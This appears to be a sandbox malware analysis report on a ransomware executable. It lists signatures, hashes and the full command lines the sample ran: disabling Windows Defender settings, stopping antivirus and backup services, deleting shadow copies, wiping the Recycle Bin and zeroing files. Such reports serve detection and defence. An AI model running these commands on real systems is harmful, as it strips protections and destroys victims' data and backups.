Analysis

  • max time kernel
    378s
  • max time network
    396s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    17-08-2024 21:22

General

  • Target

    58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

  • Size

    82KB

  • MD5

    e01e11dca5e8b08fc8231b1cb6e2048c

  • SHA1

    4983d07f004436caa3f10b38adacbba6a4ede01a

  • SHA256

    58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f

  • SHA512

    298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de

  • SSDEEP

    1536:PcW4lAJGGnzjoih/NDh/NDuk+XkGAK/hztXcag+PlbBfkWIyvZrw281r5XsmCZEe:UWNGszjoih/NDh/NDuk+XkGAK/hztXcQ

Malware Config

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Disables service(s) 3 TTPs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 3 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops startup file 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Interacts with shadow copies 3 TTPs 14 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
    "C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Drops startup file
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4816
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:2804
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:4388
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:1644
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:3300
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:4412
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:1928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:2228
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:3836
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:2628
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:196
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:3604
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:2576
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop avpsus /y
      2⤵
        PID:4124
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop avpsus /y
          3⤵
            PID:6688
        • C:\Windows\SYSTEM32\net.exe
          "net.exe" stop McAfeeDLPAgentService /y
          2⤵
            PID:3040
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
              3⤵
                PID:6552
            • C:\Windows\SYSTEM32\net.exe
              "net.exe" stop mfewc /y
              2⤵
                PID:2672
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop mfewc /y
                  3⤵
                    PID:6180
                • C:\Windows\SYSTEM32\net.exe
                  "net.exe" stop BMR Boot Service /y
                  2⤵
                    PID:3456
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop BMR Boot Service /y
                      3⤵
                        PID:6192
                    • C:\Windows\SYSTEM32\net.exe
                      "net.exe" stop NetBackup BMR MTFTP Service /y
                      2⤵
                        PID:3600
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
                          3⤵
                            PID:6892
                        • C:\Windows\SYSTEM32\net.exe
                          "net.exe" stop DefWatch /y
                          2⤵
                            PID:4616
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 stop DefWatch /y
                              3⤵
                                PID:6612
                            • C:\Windows\SYSTEM32\net.exe
                              "net.exe" stop ccEvtMgr /y
                              2⤵
                                PID:2272
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 stop ccEvtMgr /y
                                  3⤵
                                    PID:6800
                                • C:\Windows\SYSTEM32\net.exe
                                  "net.exe" stop ccSetMgr /y
                                  2⤵
                                    PID:4612
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 stop ccSetMgr /y
                                      3⤵
                                        PID:7068
                                    • C:\Windows\SYSTEM32\net.exe
                                      "net.exe" stop SavRoam /y
                                      2⤵
                                        PID:2348
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 stop SavRoam /y
                                          3⤵
                                            PID:7152
                                        • C:\Windows\SYSTEM32\net.exe
                                          "net.exe" stop RTVscan /y
                                          2⤵
                                            PID:640
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 stop RTVscan /y
                                              3⤵
                                                PID:6468
                                            • C:\Windows\SYSTEM32\net.exe
                                              "net.exe" stop QBFCService /y
                                              2⤵
                                                PID:1148
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 stop QBFCService /y
                                                  3⤵
                                                    PID:6412
                                                • C:\Windows\SYSTEM32\net.exe
                                                  "net.exe" stop QBIDPService /y
                                                  2⤵
                                                    PID:2360
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 stop QBIDPService /y
                                                      3⤵
                                                        PID:7160
                                                    • C:\Windows\SYSTEM32\net.exe
                                                      "net.exe" stop Intuit.QuickBooks.FCS /y
                                                      2⤵
                                                        PID:4356
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
                                                          3⤵
                                                            PID:7080
                                                        • C:\Windows\SYSTEM32\net.exe
                                                          "net.exe" stop QBCFMonitorService /y
                                                          2⤵
                                                            PID:4184
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 stop QBCFMonitorService /y
                                                              3⤵
                                                                PID:7088
                                                            • C:\Windows\SYSTEM32\net.exe
                                                              "net.exe" stop YooBackup /y
                                                              2⤵
                                                                PID:4192
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 stop YooBackup /y
                                                                  3⤵
                                                                    PID:6544
                                                                • C:\Windows\SYSTEM32\net.exe
                                                                  "net.exe" stop YooIT /y
                                                                  2⤵
                                                                    PID:4188
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 stop YooIT /y
                                                                      3⤵
                                                                        PID:6788
                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                      "net.exe" stop zhudongfangyu /y
                                                                      2⤵
                                                                        PID:5092
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 stop zhudongfangyu /y
                                                                          3⤵
                                                                            PID:6964
                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                          "net.exe" stop stc_raw_agent /y
                                                                          2⤵
                                                                            PID:2012
                                                                            • C:\Windows\system32\net1.exe
                                                                              C:\Windows\system32\net1 stop stc_raw_agent /y
                                                                              3⤵
                                                                                PID:6148
                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                              "net.exe" stop VSNAPVSS /y
                                                                              2⤵
                                                                                PID:4556
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 stop VSNAPVSS /y
                                                                                  3⤵
                                                                                    PID:6696
                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                  "net.exe" stop VeeamTransportSvc /y
                                                                                  2⤵
                                                                                    PID:4460
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 stop VeeamTransportSvc /y
                                                                                      3⤵
                                                                                        PID:7096
                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                      "net.exe" stop VeeamDeploymentService /y
                                                                                      2⤵
                                                                                        PID:1404
                                                                                        • C:\Windows\system32\net1.exe
                                                                                          C:\Windows\system32\net1 stop VeeamDeploymentService /y
                                                                                          3⤵
                                                                                            PID:6620
                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                          "net.exe" stop VeeamNFSSvc /y
                                                                                          2⤵
                                                                                            PID:4140
                                                                                            • C:\Windows\system32\net1.exe
                                                                                              C:\Windows\system32\net1 stop VeeamNFSSvc /y
                                                                                              3⤵
                                                                                                PID:6900
                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                              "net.exe" stop veeam /y
                                                                                              2⤵
                                                                                                PID:4824
                                                                                                • C:\Windows\system32\net1.exe
                                                                                                  C:\Windows\system32\net1 stop veeam /y
                                                                                                  3⤵
                                                                                                    PID:6628
                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                  "net.exe" stop PDVFSService /y
                                                                                                  2⤵
                                                                                                    PID:4528
                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                      C:\Windows\system32\net1 stop PDVFSService /y
                                                                                                      3⤵
                                                                                                        PID:6780
                                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                                      "net.exe" stop BackupExecVSSProvider /y
                                                                                                      2⤵
                                                                                                        PID:2008
                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                          C:\Windows\system32\net1 stop BackupExecVSSProvider /y
                                                                                                          3⤵
                                                                                                            PID:6764
                                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                                          "net.exe" stop BackupExecAgentAccelerator /y
                                                                                                          2⤵
                                                                                                            PID:4952
                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                              C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
                                                                                                              3⤵
                                                                                                                PID:6948
                                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                                              "net.exe" stop BackupExecAgentBrowser /y
                                                                                                              2⤵
                                                                                                                PID:828
                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                  C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
                                                                                                                  3⤵
                                                                                                                    PID:6932
                                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                                  "net.exe" stop BackupExecDiveciMediaService /y
                                                                                                                  2⤵
                                                                                                                    PID:220
                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                      C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
                                                                                                                      3⤵
                                                                                                                        PID:6528
                                                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                                                      "net.exe" stop BackupExecJobEngine /y
                                                                                                                      2⤵
                                                                                                                        PID:4976
                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                          C:\Windows\system32\net1 stop BackupExecJobEngine /y
                                                                                                                          3⤵
                                                                                                                            PID:6672
                                                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                                                          "net.exe" stop BackupExecManagementService /y
                                                                                                                          2⤵
                                                                                                                            PID:4784
                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                              C:\Windows\system32\net1 stop BackupExecManagementService /y
                                                                                                                              3⤵
                                                                                                                                PID:6772
                                                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                                                              "net.exe" stop BackupExecRPCService /y
                                                                                                                              2⤵
                                                                                                                                PID:4536
                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                  C:\Windows\system32\net1 stop BackupExecRPCService /y
                                                                                                                                  3⤵
                                                                                                                                    PID:6536
                                                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                                                  "net.exe" stop AcrSch2Svc /y
                                                                                                                                  2⤵
                                                                                                                                    PID:4672
                                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                                      C:\Windows\system32\net1 stop AcrSch2Svc /y
                                                                                                                                      3⤵
                                                                                                                                        PID:6956
                                                                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                                                                      "net.exe" stop AcronisAgent /y
                                                                                                                                      2⤵
                                                                                                                                        PID:4312
                                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                                          C:\Windows\system32\net1 stop AcronisAgent /y
                                                                                                                                          3⤵
                                                                                                                                            PID:6664
                                                                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                                                                          "net.exe" stop CASAD2DWebSvc /y
                                                                                                                                          2⤵
                                                                                                                                            PID:216
                                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                                              C:\Windows\system32\net1 stop CASAD2DWebSvc /y
                                                                                                                                              3⤵
                                                                                                                                                PID:6592
                                                                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                                                                              "net.exe" stop CAARCUpdateSvc /y
                                                                                                                                              2⤵
                                                                                                                                                PID:4864
                                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                                  C:\Windows\system32\net1 stop CAARCUpdateSvc /y
                                                                                                                                                  3⤵
                                                                                                                                                    PID:6728
                                                                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                  "net.exe" stop sophos /y
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3572
                                                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                                                      C:\Windows\system32\net1 stop sophos /y
                                                                                                                                                      3⤵
                                                                                                                                                        PID:6680
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SQLTELEMETRY start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:4248
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:4472
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SQLWriter start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:4476
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SstpSvc start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:4332
                                                                                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                      "taskkill.exe" /IM mspub.exe /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:4664
                                                                                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                      "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:4680
                                                                                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                      "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:5108
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:1064
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:364
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4328
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:3664
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4900
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:2068
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:404
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:2648
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:2560
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4848
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4404
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:3680
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4704
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:3968
                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2364
                                                                                                                                                      • C:\Windows\System32\mshta.exe
                                                                                                                                                        "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
                                                                                                                                                        2⤵
                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                        PID:5248
                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                        "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                                                                                                                        2⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        PID:5920
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.7 -n 3
                                                                                                                                                          3⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          • Runs ping.exe
                                                                                                                                                          PID:5776
                                                                                                                                                        • C:\Windows\system32\fsutil.exe
                                                                                                                                                          fsutil file setZeroData offset=0 length=524288 “%s”
                                                                                                                                                          3⤵
                                                                                                                                                            PID:7032
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
                                                                                                                                                          2⤵
                                                                                                                                                            PID:6512
                                                                                                                                                            • C:\Windows\system32\choice.exe
                                                                                                                                                              choice /C Y /N /D Y /T 3
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5612

                                                                                                                                                          Network

                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                          Replay Monitor

                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                          Downloads

                                                                                                                                                          • C:\HOW_TO_DECYPHER_FILES.txt

                                                                                                                                                            Filesize

                                                                                                                                                            446B

                                                                                                                                                            MD5

                                                                                                                                                            047924c5faa5ba0a9f40a0917e20c8c4

                                                                                                                                                            SHA1

                                                                                                                                                            5e397e8e329548f250a36f22b88c864902e73a13

                                                                                                                                                            SHA256

                                                                                                                                                            4630da1923563e8f4b106b53f527f36110f6fbac3fdbdb564877b20062648550

                                                                                                                                                            SHA512

                                                                                                                                                            6ff101141ea6e51ae6207c6f867e98db5d5ed79ca883cfe3b7f2ca9e8d5d331a1833da3c8ae566e6b5c1c8d78c6e6dd1f7a7e8f0c9635a21afa93a47fca4b504

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                            Filesize

                                                                                                                                                            3KB

                                                                                                                                                            MD5

                                                                                                                                                            8592ba100a78835a6b94d5949e13dfc1

                                                                                                                                                            SHA1

                                                                                                                                                            63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                                                                                                                                            SHA256

                                                                                                                                                            fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                                                                                                                                            SHA512

                                                                                                                                                            87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            634539a90acf8f13c44fbe2a82f53ab6

                                                                                                                                                            SHA1

                                                                                                                                                            39ab627b1ad77352f3f93523f3ad1a610fe15eab

                                                                                                                                                            SHA256

                                                                                                                                                            b2247cae5539a4a81411f77573325be95c386808710619d34388e0a1ae751ad2

                                                                                                                                                            SHA512

                                                                                                                                                            401e219318894e7b882970f71575f9f48c584fb53664d3f91dc450b80e8150b7405cb5fcb10e9422e70d38a5f03fb7ca66f62c66355bac2340cef319e1c65c14

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            36fc2ebbcf31492cfd3d8f5d675dcd6e

                                                                                                                                                            SHA1

                                                                                                                                                            751d33ee88dfe3ad62e26c636100a498a8fb9d13

                                                                                                                                                            SHA256

                                                                                                                                                            459e7b50b98116ffe9f1ceb744acc248d66df00f6a10599f7e705ee3579a7627

                                                                                                                                                            SHA512

                                                                                                                                                            730512d68ac468afd5516ecd73bd1301a8517e1b8cefa51a2551001bd4e2ed94616ccc7b28b6f7acbf2ac7bbf0c98da1d2aba39ff4d99463432a35c1bf51d7d9

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            eb98ba3433d8ec37a54b31e8333b09a0

                                                                                                                                                            SHA1

                                                                                                                                                            a11df5f3aa1816ee26912542e03f8648ff10f5f9

                                                                                                                                                            SHA256

                                                                                                                                                            a8c423c72cf2b51848c7c0ebccec1ee2325e4e85b307b5bfc7daad901fcdb458

                                                                                                                                                            SHA512

                                                                                                                                                            0c06b7dc7a04a4340ec05d459078d7b544bc5d0b10910694c286d5b1dbd0054e4f4a4b2fb0d31176118d59d38907ce13e94b079818089368505fabafed9b467e

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            75bdd1085b4e859dc8319693436166d6

                                                                                                                                                            SHA1

                                                                                                                                                            ba20c927b374a5682fba28b20c325e85c411d5f9

                                                                                                                                                            SHA256

                                                                                                                                                            7e1b751f03d9d63c697f36be9a45a0a30f91469cce8d124a5cd375db4e8cbb7c

                                                                                                                                                            SHA512

                                                                                                                                                            e65bb9f5e52ecac814b31eaba0a01fc34c8f4e1c277dfdf7cad3f42d346e5edc827e8e874bfbd0195a35711509aca66084d04064e32febb1df0bd96b6223bc53

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            c5a0ee6973f4624356481827039c6921

                                                                                                                                                            SHA1

                                                                                                                                                            646673ba0ebf0b3afb4673517d1a61e7b119dc4f

                                                                                                                                                            SHA256

